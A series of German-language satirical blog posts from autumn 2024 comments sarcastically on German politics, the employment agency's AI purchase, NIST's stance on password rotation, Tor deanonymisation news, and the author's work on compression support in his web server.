EINE LEITER ist nicht erlaubt! Ich wundere mich ja immer, wieso irgendein Flüchtling in dieses Land kommen wollen würde. Muss Unwissen sein.
Update: Hier ist Webseite des BGH dazu.
[l] Gute Nachrichten! Das Völkerrechts-Studium von der Baerbock hat sich doch gelohnt!
Nach ihrer Ankunft in Beirut hat Außenministerin Baerbock vor einer weiteren Eskalation des Nahost-Konflikts gewarnt. Gewalt gegen die UN-Truppen im Libanon verurteilte sie als Verstoß gegen das humanitäre Völkerrecht.
Nein! Was Sie nicht sagen, Frau Außenministerin! Wenn man Uno-Blauhelme beschießt, ist das nicht legal?!
Man vergisst ja alles so schnell wieder. Erinnert ihr euch noch, dass die Frau Kanzlerkandidatin der Grünen war? Die hätte Kanzler werden können!
Gut, auf eine Sache ist bei der SPD Verlass. Freiwillig geben die keinen Posten auf. Bin mal gespannt, wie das am Ende in den Geschichtsbüchern stehen wird, welcher die bessere Wahl gewesen wäre.
Während der Habeck die ganze Arbeit gemacht hat.

Sun Oct 20 2024

[l] Die ESA Euclid-Mission hat die ersten 1% gescannt und daraus ein 2:30 Video gemacht (Achtung: ~150 MB Download). Guckt das nicht auf eurem Handy an, lieber zuhause auf einem 4k-Bildschirm oder Fernseher.
Ich mache mich ja gerne lustig über verschwendete Steuergelder, aber hier finde ich: Gut investiertes Geld.

Thu Oct 17 2024

[l] Wenn ihr JETZT schon schlechte Erfahrungen mit dem Arbeitsamt gemacht habt, dann wartet mal, bis die mit ihrem "KI"-Push durch sind.
Die kaufen für 19 Mio Euro eine Software vom "KI"-Startup "Aleph Alpha" (die sich selber offensichtlich für absolut blutige Anfänger halten, denn Aleph ist der erste Buchstabe im hebräischen Alphabet und Alpha ist der erste Buchstabe im griechischen Alphabet).
Warum machen sie das? Nun, bis 2032 werden wohl bis zu 35% der Belegschaft in Rente gehen, das wären 40.250 Menschen. Nein, wirklich! So viele Im-Weg-Steher und Bescheid-Ablehner beschäftigt (und hier passt das Wort ja mal exquisit) das Arbeitsamt!
Tja, und so eine Zahl von moralisch bankrotten Sadisten, die gerne anderen Leuten den Lebensunterhalt unter fadenscheinigen Ausreden zusammenstreichen, die finden sie nicht. Die Nachwuchs-Generation hat da Werte.
Also: "KI". Klar.
Warte mal, Fefe, das Arbeitsamt wirkt aber seit Jahren schon so, als würde da eine "KI" Dinge formulieren! Richtig, tut sie auch!
Als Gegenmaßnahme habe die Agentur bereits eine eigene KI entwickelt und in Pilotprojekten getestet – möglich seien damit etwa Zeiteinsparungen von bis zu 30 Prozent bei der Formulierung von Bescheiden.
Hey, immerhin "prüft" die "KI" bei denen nichts, amirite?
Vor allem bei der Automatisierung von Behördenprozessen, der Erstellung von Bescheiden und Prüfung von Anträgen, aber auch beim Wissensmanagement und der Kundenberatung wolle man KI einsetzen.
Oh. Never mind.
Tja. Und so bewegen wir uns in eine schöne Scifi-Dystopie hinein, wo Software, die niemand versteht, Dinge entscheidet, die niemand versteht, und es gibt auch gar kein Personal, was das verstehen könnte. Das Personal, das es gibt, ist natürlich auch nicht aufgerufen, irgendwas gegenzuprüfen.
Hey, trifft ja niemanden, den wir kennen. Nur so Leute, die es verdient haben, richtig? Denn wer arbeiten WILL, der findet auch einen Job! Nicht wahr, liebe SPD? Oh warte, die SPD ist ein schlechtes Beispiel. Die finden auch alle keine Jobs und lassen sich daher vom Steuerzahler für ihre "Arbeit" in den Parlamenten alimentieren, und danach kriegen sie Aufsichtsratsposten und "arbeiten" in überflüssigen Bullshitbehörden.
Tja, aber so ist das im Kapitalismus. Du musst den Leuten immer vor Augen halten, dass es ihnen noch viel schlechter gehen könnte, damit sie sich ausbeuten lassen. Und wie könnte man das besser zeigen als mit lauter Arbeitslosen, deren Arbeitsplätze man mit "KI" zerstört hat, und die dann von besagter "KI" unten gehalten und malträtiert werden.
Hinter dem KI-Assistenten steht ein Konsortium aus Aleph Alpha, Schwarz Digits und GovTech Campus Deutschland. Für das F13-Komplettpaket verlangen die Partner 1,50 Euro pro Bildschirmarbeitsplatz und Monat.
Oh, ein Abomodell! Aber natürlich, mein Herr!
Ist dieser "Govtech-Campus" eigentlich schon mal jemandem in positivem Kontext begegnet? Mir nicht.
Hey, sind da wenigstens die üblichen unfähigen Abgreifer am Start?
Bei der Integration und der Umsetzung individueller Wünsche stünden die Partner Deloitte, PwC und Materna zur Seite.
Irgendwo muss das ganze Geld ja hin, das wir den Arbeitslosen aus der Tasche gezogen haben!1!!
Update: "Schwarz Digits" ist übrigens Teil der Schwarz-Gruppe vom Lidl- und Kaufland-Eigentümer Dieter Schwarz.
Wir haben es hier also mit dem deutschen Äquivalent von "bei Wish gekauft" zu tun :-)

Wed Oct 16 2024

[l] Daimler-Manager hat brillante Idee zur Förderung von E-Autos.
Setzt euch mal stabil hin. Das ist genial. 4d-Schach geradezu.
Der langjährige Daimler Truck-Chef Martin Daum hat im Kampf für mehr Klimaschutz einen jährlichen Aufschlag auf den Kraftstoffpreis ins Spiel gebracht, um Menschen verstärkt zum Umstieg auf Elektroautos zu bringen. "Wenn wir heute rausgehen würden und sagen: Jeden 1. Januar werden zehn Cent zusätzlich auf den Liter Benzin draufgemacht, von jetzt bis zur Unendlichkeit, dann wird es die ersten drei oder vier Jahre noch in der normalen Schwankungsbreite des Benzinpreises drin liegen", sagte der 64-Jährige im SWR-Videopodcast "Zur Sache intensiv". Der gewünschte Effekt komme aber bald: "Und dann wird es irgendwann mal so gewaltig beißen, dass sie nie mehr auf die Idee kämen, wenn sie Vielfahrer sind, sich einen Benziner zu kaufen, sondern würden sie sich sofort ein E-Auto kaufen."
Boah Scheiße, Bernd! Wieso sind wir da nicht selber draufgekommen? Wenn das die Grünen hören, dass die Lösung so einfach gewesen wäre!!
Weißt du was? Wir könnten es Ökosteuer nennen!

Sat Oct 12 2024

[l] Endlich denkt mal jemand an die darbende Pharmaindustrie! Die kriegen jetzt endlich eine Gesetzesänderung von unser aller Lieblingskanzler.
Bislang dürfen Pharmakonzerne zunächst den Preis frei wählen, wenn in Deutschland ein neues Medikament auf den Markt kommt. Erst nach einem Jahr bewertet ein Gremium aus Vertretern von Ärzten, Krankenkassen und Kliniken den Wert des neuen Medikaments. Kommen Sie zum Ergebnis, dass das neue Präparat keinen belegten Zusatznutzen gegenüber bisher verfügbaren Therapien hat, muss der Pharmakonzern einen Rabatt gewähren, der oft mehr als 50 Prozent beträgt.
Oh, denkt ihr euch jetzt bestimmt, da hat er Scholz endlich mal was sinnvolles gemacht und dafür gesorgt, dass die Medikamente nicht rabattiert werden sondern vom Markt genommen werden, wenn sie offensichtlich bloß Abzocke sind und keinen Mehrwert bieten?
Nun ... nicht ganz.
"Eli Lilly knüpft seine Investitionsentscheidung an die Zusage der Bundesregierung, vertrauliche Rabatte bei innovativen Arzneimitteln zu ermöglichen."
Na und wer kann da schon nein sagen? Wenn die arme wehrlose Eli Lilly so herzallerliebst um Hilfe fleht?
Die gute Nachricht ist, dass die nächste Regierung das natürlich einfach wieder rückgängig machen kann.
Die schlechte Nachricht ist, dass die alle genau so korrupt wie der Scholz sind und das nicht tun werden.
Ach komm, ist doch nicht mein Geld, um das es hier geht! Schäden sind immer dann am besten hinnehmbar, wenn sie andere Leute treffen.

Thu Oct 10 2024

[l] Die Münchener Stadtwerke haben anscheinend das Telekom-Playbook gegen die Telekom angewendet. Vier Jahre lang, sagt die Telekom, seien sie von M-Net hingehalten worden, und jetzt hat M-Net 70% Glasfaser-Haushalt-Abdeckung im München.
Selbst Höttges ist beeindruckt über so viel Geschick.
"Dann haben wir vier Jahr verhandelt mit der M-net, um dann zu lernen, dass die nie ein Interesse hatten, uns ihre Infrastruktur zur Verfügung zu stellen. Sehr geschickt gemacht von der M-net, uns vier Jahre da rauszuhalten. Ich habe Respekt davor, wie die uns an der Nase herumgeführt haben", betonte Höttges.
Bonus: M-Net stellt das andersherum dar. Die Verzögerung sei dadurch zustande gekommen, dass die Telekom plötzlich ihre Anforderung geändert hatte.
Höttges habe auch selbst von einem reziproken Zugang gesprochen. Die Realität ist laut Lindhuber: "Heute, drei Jahre später, hat die Telekom in München Zugriff auf das Netz von M-net in München – wir aber nicht auf das Netz der Telekom."
Niemand out-telekomt die Telekom. Niemand. :-)

Fri Oct 4 2024

[l] Aus der beliebten Reihe "Hersteller verteilt kaputte Updates", heute: Samsung.
Samsung hat mit einem fehlerhaften Update mehrere ältere Galaxy-Smartphones unbrauchbar gemacht. Betroffene Geräte hängen in einer Bootschleife fest, versuchen also wiederholt, neuzustarten. Eine zufriedenstellende und einfache Lösung für das Problem gibt es aktuell nicht.
Na doch, klar. Nicht mehr bei Samsung kaufen. Denen auch mitteilen, dass du sie ab jetzt boykottierst, weil sie kaputte Updates ausliefern.
Solange solche Hersteller nicht auf die Fresse kriegen für solches Verhalten, wird sich an dem Verhalten auch nichts ändern.
Microsoft hat nicht auf die Fresse gekriegt, daher ist das jetzt halt so bei denen.

Thu Oct 3 2024

[l] Der aktuelle Hurricane hat in North Caroline übrigens einen Single Point of Failure kaputtgemacht: Eine Quartzmine mit besonders purem Quartz. Anderer Bericht darüber.

Wed Oct 2 2024

[l] Nachdem jetzt Firefox und Chrome neben gzip und Brotli auch Zstandard unterstützen, habe ich das mal in gatling eingebaut.
gatling komprimiert nichts, aber wenn man nach foo.html fragt, und man kann Brotli, und da liegt foo.html.br, dann kriegt man das ausgeliefert. Es kostet also nicht viel, auch kurz nach foo.html.zst zu gucken.
Ich habe das also kurz gemacht. Nota bene: Die Browser, die jetzt zstd können, können auch alle brotli.
Stellt sich raus: brotli komprimiert in eigentlich allen Fällen besser. Das liegt vor allem daran, dass Brotli bescheißt, und mit einem Dictionary an bekannten Wörtern kommt, die aus typischen HTML- und Javascript-Dateien extrahiert wurden.
Das könnte man mit zstd natürlich auch machen. Machen die Browser das? Wüsste ich gerade nicht. Wenn doch, könnte ich meine Dateien natürlich auch mit einem shared dictionary ala brotli zstd-komprimieren.
Ist zstd damit nutzlos? Nein, bei weitem nicht. Wenn man dynamische Daten ausgibt, wie es beispielsweise mein Blog tut, dann kann ich die ja nicht vorkomprimiert ins Dateisystem legen. Also könnte ich vielleicht doch partiell, wenn ich ein bisschen trickse. Mache ich aber nicht.
Jedenfalls: Für mein Blog würde es Sinn ergeben, zstd zu unterstützen. Da mache ich im Moment nur gzip, und das auch nur bei einer relativ kleinen Kompressionsstufe. Da würde sich zstd wahrscheinlich lohnen, weil es vergleichsweise rattenschnell komprimieren kann.
Das ist jetzt jedenfalls ein bisschen antiklimaktisch und ich werde auf die Erkenntnis mal reagieren, indem ich einfach nur zstd-Dateien hinlege, wenn die kleiner als die Brotli-Version sind.
Update: Das Blog kann jetzt zstd. Das hat die Größe des Binaries direkt verdoppelt. Lohnt sich hoffentlich in der Praxis.

Mon Sep 30 2024

[l] Die Grünen wissen, wie man das Land retten kann. Mit einer App.
Der Deutschland-App.
Nein, wirklich!
Diesmal sind die Satiriker wirklich zu weit gegangen.
"Ein Land, das einfach funktioniert." Das wünscht sich die Bundestagsfraktion der Grünen auch nach drei Jahren Regierungsbeteiligung.
Sehr schöne Formulierung, finde ich. Wieso habt ihr das dann nicht vor drei Jahren gemacht?

Thu Sep 26 2024

[l] Hat eigentlich schon jemand FDJ-Jokes gemacht über die grüne Jugend?
Oder Jungpioniere-Jokes?
Ein Kumpel, der im Osten großgeworden ist, erklürt mir gerade, dass es Jung- und Thälmannpioniere gab, und die hatten blaue und rote Halstücher. Grün wäre also noch frei für FDJ 2.0!
[l] Heißt der Schulterschluss der Grünen Jugend mit den Linken, dass die Linken jetzt von den Grünen Klimakleben lernen, oder dass die sich jetzt zusammen über Pronomen aufregen und komplett in der Bedeutungslosigkeit versinken?
In other news: GANZ neue Töne von der CDU:
Bereits zuvor hatte die CDU klargemacht, keinen Regierungsauftrag in den Wahlergebnissen zu sehen.
Was ist denn da los? Das hat es ja noch nie gegeben! Gut, 10% ist ziemlich schlecht für die CDU, aber trotzdem. Es war bislang egal, wie krass die vom Wähler abgestraft wurden. Immer haben sie danach vom Wählerauftrag für sich schwadroniert und das als Sieg gefeiert.
In other news: Die AfD beweist in Thüringen, dass sie genau die antidemokratischens Möchtegern-Diktatoren sind, die alle angenommen hatten, dass sie sind. Ich wusste ja, dass die nicht schlau sind, aber dass sie SO doof sind, das finde ich schon bemerkenswert. Der smarte Move wäre gewesen, jetzt alles zu tun, um wie eine seriöse Partei auszusehen, und die Macht auszubauen. Die Stimmen der antidemokratischen Idioten haben sie ja. Jetzt wäre der Moment gewesen, die anderen zu gewinnen zu versuchen. Einmal mit Profis, ey.
Das Arschloch-Verhalten liegt auf Seiten der AfD, aber das Versagen liegt auf Seiten der anderen Parteien, die das nicht vor der Wahl geklärt haben. Vollpfosten, allesamt. Die haben halt gezockt, dass sie sich besser als Opfer inszenieren können, wenn sie das nach der Wahl machen. Und jetzt leiden alle darunter. Wenn ihr mich fragt, haben die sich alle gegenseitig verdient in Thüringen.
Update: Findet das eigentlich noch jemand urkomisch, dass der älteste Politiker nicht bei den "Altparteien" (AfD-Lingo) ist sondern bei der jungen, frischen AfD? Die CDU (!!) hat niemanden gefunden, der älter als dieser AfD-Typ ist? Was für Flaschen sind denn das eigentlich alles da in Thüringen?

Wed Sep 25 2024

[l] Seit Jahrzehnten geht der Mythos um, dass man Passwörter rotieren sollte, weil das dann sicherer ist. Seit ebenfalls über 10 Jahren ist das wissenschaftlich untersucht und das Ergebnis war eindeutig: Bringt nicht nur nichts, ist kontraproduktiv.
Zurückgegangen ist das auf NIST, die US-amerikanische IT-Sicherheitsbehörde. Die haben natürlich die Empfehlung zurückgezogen, als die Fakten auf dem Tisch lagen. Aber wenn so ein Scheiß einmal in alle möglichen Prozesse reingewandert ist, kriegst du das auch nicht mehr weg.
Daher hat das NIST jetzt die Brechstange rausgeholt und periodische Passwortrotation zu einem SHALL NOT gemacht (3.1.1.2 Punkt 6).
Mit anderen Worten: Das ist jetzt ein gültiges Security Finding in Audits. Das zu tun, was das NIST vor ein paar Jahren vorgeschrieben hat.
Ist auf der einen Seite witzig, aber ich finde das auch einen Hoffnungsschimmer. Nicht viele Menschen oder gar Organisationen sind in der Lage, Fehler nicht nur anzuerkennen, sondern Konsequenzen daraus zu ziehen. Schon gar nicht, wenn die Konsequenzen vielleicht peinlich sind.
In diesem Sinne: Gute Arbeit, NIST!
Oh und wenn ihr in einem Laden arbeitet, der Passwörter rotiert, dann holt euch mal gleich die Bug Bounty ab und meldet das als Sicherheitslücke.
Update: Ein Leser merkt an, dass das BSI das auch schon als Sicherheitslücke klassifiziert (unter ORP.4.A23).
IT-Systeme oder Anwendungen SOLLTEN NUR mit einem validen Grund zum Wechsel des Passworts auffordern.
Update: Ein Kollege hat das mal recherchiert und sagt, das geht nicht auf NIST sondern die Rainbow Books vom Pentagon zurück.
Update: Ein anderer Kollege meint gerade, dass das schon länger beim NIST so steht, mindestens seit April. Wenn das so ist, hab ich da von nichts mitgekriegt und freu mich dann halt jetzt mit Verspätung :-)

Mon Sep 23 2024

[l] Lust auf ein bisschen Spaß am Gerät? Salesforce hat John Mulaney zu ihrer KI-Konferenz eingeladen.
John Mulaney ist ein Comedian, eigentlich eher bekannt für seine vergleichsweise zahmen Routinen, bis er nach einer Intervention seiner Freunde Rehab machen musste und sein aktuelles Special darüber gemacht hat.
Jetzt hat man eher den Eindruck, er hat alles gesehen und getan und hat keine Zeit mehr für Höflichkeiten. Er hat sich jedenfalls vorne hingestellt und das Publikum beschimpft. Eine Dreiviertelstunde lang.
In dem Artikel stehen nur ein paar Highlights, aber die sind schonmal sehr schön.
Viel Spaß!
[l] Das Deutschlandticket wird 9 Euro teurer.
War ja klar. Da haben die einmal versehentlich was richtig gemacht! Natürlich war das bloß ein Versehen und wird sofort korrigiert. Wo kämen wir da hin, wenn die Politik einmal Politik für ihre Wähler machen würde!
Update: Ein Leser kommentiert:
kein wichtiger Input, nur eine offensichtliche Pointe, bevor der Postillon drauf kommt:
Die Politik hat hier einfach nur das Beste der beiden Vorgänger kombiniert, spricht den Preis. 9-Euro-Ticket + DE-Ticket '24 = DE-Ticket '25
:-)

Sat Sep 21 2024

[l] Gute Nachrichten! Cards Against Humanity verklagt Elon Musk.
Die hatten vor ein paar Jahren eine Crowdfunding-Aktion gemacht und ein Stück Land gekauft, das genau auf dem Pfad der "Mauer gegen Mexiko" lag und damit den Bau verhindert hätte.
Nun wurde aus der Mauer nichts, und die saßen da auf dem Land und alles war gut.
Dann kam SpaceX vorbei und hat da Unrat gelagert. Als die Cards Against Humanity-Leute das bemerkten, haben sie SpaceX angeschrieben, und die meinten so: Ihr habt 12 Stunden, uns das Land unter Wert zu verkaufen.
Cards Against Humanity zeigte ihnen den Stinkefinger und verklagt den Laden und Elon Musk. Wer des Englischen ein bisschen mächtig ist, sollte sich diese wunderschöne Webseite mal in Ruhe durchlesen.

Fri Sep 20 2024

[l] Old and busted: Medikamente sind nicht lieferbar.
New hotness: Medikamente gänzlich aus dem Verkauf genommen, weil die Kosten für die EU-Zertifizierungs-Bürokratie den erreichbaren Profit übersteigen.
Ich hoffe, ihr habt alle nur Massenmarkt-Krankheiten!
Update: Einigen ist es schon aufgefallen: Ich habe hier mit der Brechstange einen Old-and-busted-Joke draus gemacht, der eigentlich nicht gepasst hätte, weil es in dem New-Hotness-Link um Medizinprodukte geht, nicht um Medikamente. Medizinprodukte sind Geräte und Bandagen und so.

Wed Sep 18 2024

[l] Achtet mal darauf, wieviele Politiker, insbesondere Regierungschefs, gerade mit Gummistiefeln in Krisengebieten Photo-Ops machen.
Das hat Tradition. Nach Gerhard Schröder heißt es die Oderflut-Methode.
Ich könnte ja immer nur im Strahl kotzen bei sowas. Jahrelang aussitzen und dann betroffen tun, während nebenan die Leute absaufen.
Update: Ich weiß nicht, wieso ich immer Oderflut sage. Es war eine Elbflut, die Schröders Amtszeit verlängerte.
Update: Ein Leserbrief eilt mir zur Seite:
die Oderflut (1997) ist zu Recht in Deinem Gehirn präsent gewesen: Das war (neben Helmut Schmidt in HH) die Geburtsstunde der Gummistiefelpolitik.
Hier wurde Matthias Platzeck populär durch seine Präsenz auf den Deichen. Er hat es vorgemacht.
[l] "Strafverfolger hebeln Tor-Anonymisierung aus".
Vorsicht: Das beruht ausschließlich aus Selbstdarstellung der Behörden. Bei Geheimdiensten gibt es seit vielen Jahren das Konstrukt der "parallel construction", wenn du jemanden über Mittel hopsnimmst, die vor Gericht nicht zulässig wären, dann erfindest du halt eine alternative Erklärung, wie du denjenigen erwischt hast. "Wir haben eine zufällige Überprüfung auf der Autobahn gemacht" oder so. Und jetzt halt: "Wir haben eine zufällige Überprüfung auf der Datenautobahn gemacht".
Sie sagen, sie hätten Tor über einen Timing-Angriff deanonymisiert. Das Tor-Projekt weiß da m.W. nichts von, der Aufwand wäre enorm und würde ein Level an Zugriff benötigen, das die eigentlich nicht haben dürften, soweit ich weiß.
Ich wäre also erstmal vorsichtig, denen das einfach zu glauben. Wenn sie das jetzt behaupten, dann sicherlich auch um andere Darknet-Kriminelle aus dem Tor-Netzwerk zu locken.
Das galt im Übrigen noch nie als unmöglich, dass dieser Angriff eines Tages gelingen würde. Daher hat das Tor-Projekt extra Maßnahmen eingebaut, um das zu erschweren.
Dass eines Tages ein Amtsgericht einfach O2 sagen würde, sie sollen alle Daten rausrücken, das hielt allerdings tatsächlich bisher niemand für möglich. Es gab da noch (offenbar unverdiente) Rechtsstaats-Vermutungen für Deutschland.
Ich habe keine Unterlagen gesehen und bin daher eher skeptisch, dass die Polizei das tatsächlich geschafft haben soll. Aber wer Tor benutzt, riskiert das immer grundsätzlich, dass irgendwelche Unrechtsregime, Geheimdienste oder das Amtsgericht Frankfurt freidrehen und ihn deanonymisieren. Tor kann nicht zaubern, kann das nur sehr aufwendig machen.
Update: Nach Gesprächen mit Leuten, die näher an Tor dran sind als ich, muss ich glaube ich meine Einschätzung revidieren, wie schwierig der Angriff war. Tor hätte da noch deutlich mehr tun können. Auf der anderen Seite ist ein Echtzeit-Chat-Dienst wie der hier angegriffene Ricochet natürlich der absolut schlechteste Fall für die Verteidigung gegen Timingangriffe.
Man muss das glaube ich so sehen: Ein Timing-Angriff ist ein Grundrauschen-Risiko auf Tor, genau wie man bei Hotelzimmern ein Grundrauschen-Risiko hat, dass das Hotelpersonal den Laptop verwanzt, wenn man ihn unbeaufsichtigt im Zimmer lässt. Aber das ist jetzt halt kein NSA-Level-Risiko mehr sondern eher ein Dorfpolizei-Risiko, und wird auch nicht gegen die Osama bin Ladens dieser Welt eingesetzt sondern gegen irgendwelche Darkweb-Schmuddel-Leute.
Update: Link-Mispaste korrigiert.
Update: Wenn die Tagesschau sagt, dass O2 verpflichtet wurde, allen Kundentraffic an diese IP an das BKA auszuleiten, ist das übrigens ganz normale Abhör-Netzfunktionalität. Kann natürlich sein, dass das BKA da Spezialhardware hingekarrt hat und selber filtern wollte, aber wahrscheinlicher ist, dass O2 einfach eine Regel in ihrem Interface konfiguriert hat.

Mon Sep 16 2024

[l] Die Hysterie dieser Desinformationsbekämpfer wird immer lächerlicher. DIE RUSSEN!!1! haben eine GEHEIMABTEILUNG!1!! für Manipulation anderer Länder aufgemacht!!!1!!!
Hier sind ihre Ziele:
Für Deutschland formuliert die SDA in einer Präsentation das Ziel: "Erhöhung des Stimmenanteils der AfD auf 20 Prozent"
Ein gut gewähltes Ziel. Da mussten sie gar nichts für tun. Unsere Parteien haben alle Arbeit für sie gemacht!
Ein weiteres erklärtes Ziel der SDA: eine Zunahme des Indikators "Zukunftsangst" zu erreichen.
Noch ein sehr unambitioniertes Ziel, nachdem Russland einen Angriffskrieg ein Land weiter führt, und die Ukraine uns die Gaszufuhr weggebombt hat. Nachdem eine Pandemie das Land über ein Jahr lang paralysiert hat. Während der Klimawandel den Planeten zerstört und wir gerade aktuell mal wieder ein Jahrhundert-Wetterereignis haben. Das fünfte dieses Jahrhundert bisher.
Da wollen die als Ziel, dass wir Zukunftsangst haben? German Angst ist sprichwörtlich im Ausland. Wir waren schon über 55%, bevor die Sowjetunion zerbarst!
Und auch ein weiteres Ziel sollte erreicht werden: "Polarisierung der deutschen Gesellschaft - Zurückhaltung bei der Wahl der Grünen bei über 40 Prozent" - wiederum gemessen an Umfragen.
Tja nun, das hat nie getriggert, weil das noch nicht stattgefunden hat.
Entweder diese Abteilung ist SUPEREFFIZIENT!1!! oder ihre Ziele waren sehr unambitioniert.
OK aber vielleicht haben sie ja unfassbare Dinge erreicht? Gucken wir doch mal:
Laut den geleakten Screenshots verfolgt die SDA in Deutschland öffentliche Äußerungen von Politikern und anderen Meinungsführern ganz genau.
Holy shit! Die lesen unsere Zeitungen?! Um mal Monkey Island zu zitieren: Ich schlottere, ich schlottere!!
Die Agentur behauptet, eine Datenbank mit mehr als 1.000 Personen zu führen. Dazu gehören Vertreter von verschiedenen Parteien.
OH NEIN!!! Eine Datenbank!! Mit über 1000 Personen!!!! Mein örtlicher Supermarkt führt Datenbanken mit mehr Einträgen!
Auch die öffentlichen Äußerungen von Spitzenpolitikern und mehreren Fernsehmoderatoren werden in Moskau gelesen, gesammelt und ausgewertet.
Habt ihr auch solche Angst? Die beobachten unser Fernsehen!!!
In einem weiteren Dokument entwirft die SDA 24 Motivvorlagen für Graffiti, die dem Titel zufolge offen für jeden sichtbar auf Gebäude in Deutschland gesprüht werden sollten.
Ach deshalb haben wir in den letzten Jahren immer Hubschraubereinsatz gegen Graffiti-Sprayer! Das sind alles russische Schläfer-Agenten!1!!
Ja gut, aber mit Beobachten und Motivvorlagen änderst du ja nichts. Wo sind sie denn mal so richtig aktiv geworden?
Das Recherche-Team hat mehr als 250 solcher Posts überprüft, Karikaturen und Bilder sowie Umsetzungen der Narrative aus den SDA-Unterlagen im Netz wiedergefunden. Besonders viele finden sich in einem Telegram-Kanal namens "VoxCartoons".
Sie betreiben einen Telegram-Kanal, von dem noch nie jemand gehört hat!1!! SCHEISSE, BERND! RUF DIE KAVALLERIE!!!
[l] Analog zu Regulatory Capture (Aufsichtsbehörde soll eigentlich Industrie regulieren, aber rekrutiert am Ende ihr gesamtes Personal aus besagter Industrie und hört nur auf Lobbyisten der eigentlich zu regulierenden Industrie) gibt es auch Media Capture, wenn die Vierte Gewalt es sich so vollständig im Arsch der Industrie oder Regierung bequem gemacht hat, dass sie ihrer Aufgabe nicht mehr nachkommen (können).
Hier ein aktuelles Beispiel: Mac & I vom Hannoveraner Pressemitteilungsabdruckdienst.
Was ist passiert? Apple macht Werbung für Features, die es noch nicht gibt.
Früher nannte man das Betrug oder Arglistige Täuschung.
Mac & I nennt es:
Interessant daran: Keines der insgesamt drei präsentierten Features ist mit der Auslieferung der neuen Apple-Smartphones verfügbar – und eines dürfte erst im kommenden Jahr erscheinen.
Oh, interessant, ja? Das heilige Apple kennt kein Fehl und Tadel! Du hältst es bestimmt bloß falsch!

Fri Sep 13 2024

[l] vielleicht kein Bauchlacher aber auch recht amüsant: Al Jazeera berichtet über die USA, wie man sonst über afrikanische Bananenrepubliken berichten würde. Sehr schön gemacht.
Debate in nuclear-armed former colony fails to reassure global community
The televised face-off between the leading candidates for US president amplified widespread concerns over the state of democracy in the troubled North American nation.
*kicher*
Held in the relatively stable northeastern state of Pennsylvania on the eve of the 23rd anniversary of the country’s worst terrorist attack, the debate was a chance to showcase the democratic progress the country had made since the violent, shambolic elections and attempted coup nearly four years ago.
*chef's kiss*
[l] Amazon behauptet, x25519 und ed25519 deutlich beschleunigt zu haben. Das kann natürlich grundsätzlich sein, dass da Performance nicht ausgeschöpft wurde, aber diese beiden Verfahren sind eigentlich bekannt für ihre hohe, geradezu enorme Performance, während sie gleichzeitig darauf achten, keine Seitenkanäle zu haben (Timing oder sonstige).
Insofern wäre schon eine Ankündigung von 5% mehr Performance etwas besonderes. Amazon verspricht hier aber eher 50% mehr Performance (je nach CPU-Architektur). Das ist schon ein ziemlicher Wumms.
Bemerkenswerterweise behaupten sie auch, dabei nicht die Seitenkanalfreiheit kompromittiert zu haben, und dass sie per automatisierter Korrektheitsbeweisführung nachweisen können, dass das auch alles korrekt arbeitet. Diese Art der Beweisführung ist für einen Algorithmus dieser Komplexität ein ziemlich dickes Brett.
So und dann wird es noch krasser. Der Quell-Algorithmus lag in Assembler-Code vor, und sie arbeiten auch weiterhin auf Assembler-Ebene. Ihre Beweissoftware wurde mit der genauen Semantik aller verwendeten CPU-Instruktionen konfiguriert. Das ist ziemlich heiße Scheiße, wenn es stimmt.
Und das beste: Ist Open Source, liegt auf Github. Lizenz ist die von BoringSSL, wovon sie geforkt haben. Das ist seinerseits ein Fork von OpenSSL, den Google gemacht hat. Ihre neuen Dateien sind Apache 2.0-Lizenz oder ISC-Lizenz, d.h. können sogar in kommerziellem Code verwendet werden.
Wenig bekannt ist, dass Amazon auch eine eigene TLS-Library hat. Sogar mehrere anscheinend. Auch unter freien Lizenzen.
Ist also nicht alles Scheiße, was Amazon macht. :-)
Update: Hier ist ein Paper und hier ist eine Präsentation zu der verwendeten Software. Ausgesprochen eindrucksvoll, was die da erreicht haben!

Thu Sep 12 2024

[l] Ist hier jemand O2-Kunde? Oder ein Reseller im O2-Netz?
Damit das BKA den Betreiber des pädokriminellen Forums "Boystown" enttarnen konnte, führte der Telefónica-Konzern 2020 eine großflächige Überwachung durch.
Irgendein pisseliges Amtsgericht hat Telefonica gesagt, sie müssen jetzt alle IPs raussuchen, die mit einem bestimmten Server reden. Und Telefonica hat das halt gemacht dann.
Die Rechtsgrundlage dafür war natürlich nicht vorhanden, aber seit wann hält das unseren Rechtsstaat auf.
Wisst ihr, was wir jetzt brauchen? Ein paar Gesetzesverschärfungen! Fallen jemandem noch welche ein? Nicht? Äh na gut, dann verbieten wir halt Nagelfeilen!
Ich sehne mich ja manchmal nach meiner Schulzeit zurück. Da wirkte das alles noch evidenzbasiert, und als ob an Entscheidungen schlaue Leute mitwirken. Als ob sich die Behörden an Recht und Gesetz halten.

Thu Sep 5 2024

[l] Und noch ein Leserbrief aus Thüringen. Die werden irgendwie immer apokalyptischer!
Das alles ist nicht neu. Ich stamme ursprünglich aus der Region und habe den Hitler-Kult und die Juden-"Witze", Gaskammer-"Witze" etc. schon um 1984 von ca. 10-jährigen Schulkindern zu hören bekommen. Hitlergruß war bei Jugendlichen Mitte/Ende der 1980er Jahre relativ "normal". Das wurde in offenbar recht vielen Familien gepflegt und Generation für Generation weitergegeben.
Kurz vor der Wahl erschien in der Ostthüringer Zeitung ein Leserbrief, der fasst aus meiner Sicht gut zusammen, in welch "prekärer" Lage die "armen, abgehängten Ostdeutschen" sind, die keine andere Wahl mehr sehen, als die AfD zu wählen:
[Screenshot Leserbrief].
Genau so nahm ich das auf Heimatbesuchen auch wahr. Je wohlhabender, je mehr SUV vor und je mehr Pool für die Enkel hinter dem frisch sanierten Haus, umso widerwärtiger. Es gibt Regionen, da ist ein erheblicher Teil des Mittelstandes, KMU, Handwerk, Ärzte etc. betroffen. Die wollen einfach noch mehr haben - und das nur für sich allein. Sie halten sich für die Besten, die Einzigen, die Größten, leugnen Naturgesetze, leugnen die Erkenntnisse der Klimaforschung.
Ich habe Menschen in Thüringen erlebt, die ganz offen aussprechen, dass sie sich "Krieg" wünschen - Krieg gegen die Westdeutschen, gegenüber denen sie sich für benachteiligt halten. Das kommt auch in nach außen äußerst wohlhabend auftretenden Kreisen vor.
